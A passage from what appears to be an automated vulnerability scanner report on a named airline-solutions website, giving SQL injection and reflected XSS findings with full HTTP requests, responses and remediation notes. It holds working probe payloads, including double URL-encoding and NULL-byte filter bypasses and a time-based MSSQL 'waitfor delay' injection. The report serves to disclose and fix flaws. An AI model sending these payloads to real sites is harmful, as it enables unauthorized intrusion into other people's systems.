The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /home/products_services/sabre_community_portal%2527 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_community_portal
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:09:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/sabre_community_portal%2527%2527 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_community_portal
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;

Response 2

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:09:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322307; expires=Thu, 06-Oct-2011 04:09:37 GMT; path=/
Set-Cookie: exp_last_activity=1286356175; expires=Thu, 06-Oct-2011 04:09:37 GMT; path=/
Location: http://www.sabreairlinesolutions.com/home/page-not-found/
Content-Length: 0
Connection: close
Content-Type: text/html


2.26. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/airline_community

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/services/airline_community HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322629; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fautomated_exchange_and_refunds%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:35:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/services/airline_community HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322629; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fautomated_exchange_and_refunds%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:35:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322629; expires=Thu, 06-Oct-2011 03:35:52 GMT; path=/
Set-Cookie: exp_last_activity=1286354150; expires=Thu, 06-Oct-2011 03:35:52 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:36:07 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.27. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/airline_community/

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/services/airline_community/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382'; exp_last_activity=1286322217; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:18:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/services/airline_community/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382''; exp_last_activity=1286322217; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:18:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322217; expires=Thu, 06-Oct-2011 03:18:52 GMT; path=/
Set-Cookie: exp_last_activity=1286353132; expires=Thu, 06-Oct-2011 03:18:52 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:18:57 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.28. http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services [exp_last_activity cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/consulting_services

Issue detail

The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the exp_last_activity cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /home/products_services/services/consulting_services HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322619%2527; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:23:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/services/consulting_services HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322619%2527%2527; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:23:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322619%27%27; expires=Thu, 06-Oct-2011 03:23:33 GMT; path=/
Set-Cookie: exp_last_activity=1286353408; expires=Thu, 06-Oct-2011 03:23:33 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:23:55 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.29. http://www.sabreairlinesolutions.com/images/uploads/flash/flvPlayer.swf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /images/uploads/flash/flvPlayer.swf

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 4. The application took 24735 milliseconds to respond to the request, compared with 266 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /images/uploads/flash/flvPlayer.swf'waitfor%20delay'0%3a0%3a20'--?width=384&height=328&flashvars=videoPath=cost_centric3.flv&hideLogo=true&newWidth=384&newHeight=328&volAudio=60 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323070; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Fsabre_revenue_integrity%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A3%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3B%7D;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 11:25:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323070; expires=Thu, 06-Oct-2011 11:26:00 GMT; path=/
Set-Cookie: exp_last_activity=1286382359; expires=Thu, 06-Oct-2011 11:26:00 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fabout%2Fpage-not-found%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Fsabre_revenue_integrity%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A4%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 11:26:11 GMT
Pragma: no-cache
Content-Length: 7109
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

3. Cross-site scripting (reflected)  previous  next
There are 143 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://www.sabreairlinesolutions.com/home/about [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00aabbe"><a>a58115eef59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aabbe"><a>a58115eef59 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about?%00aabbe"><a>a58115eef59=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:09:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316560; expires=Wed, 05-Oct-2011 17:09:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:09:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/about?%00aabbe"><a>a58115eef59=1">
...[SNIP]...

3.2. http://www.sabreairlinesolutions.com/home/about/complete_the_picture/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/complete_the_picture/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e3fbe"><a>dc36cf7621c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3fbe"><a>dc36cf7621c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/complete_the_picture/?%00e3fbe"><a>dc36cf7621c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:09:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316573; expires=Wed, 05-Oct-2011 17:09:33 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fabout%2Fcomplete_the_picture%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:09:54 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8527


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/about/complete_the_picture/?%00e3fbe"><a>dc36cf7621c=1">
...[SNIP]...

3.3. http://www.sabreairlinesolutions.com/home/about/copyright_and_trademark/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/copyright_and_trademark/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007b237"><a>8a1a1739deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7b237"><a>8a1a1739deb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/about/copyright_and_trademark/?%007b237"><a>8a1a1739deb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:09:57 GMT
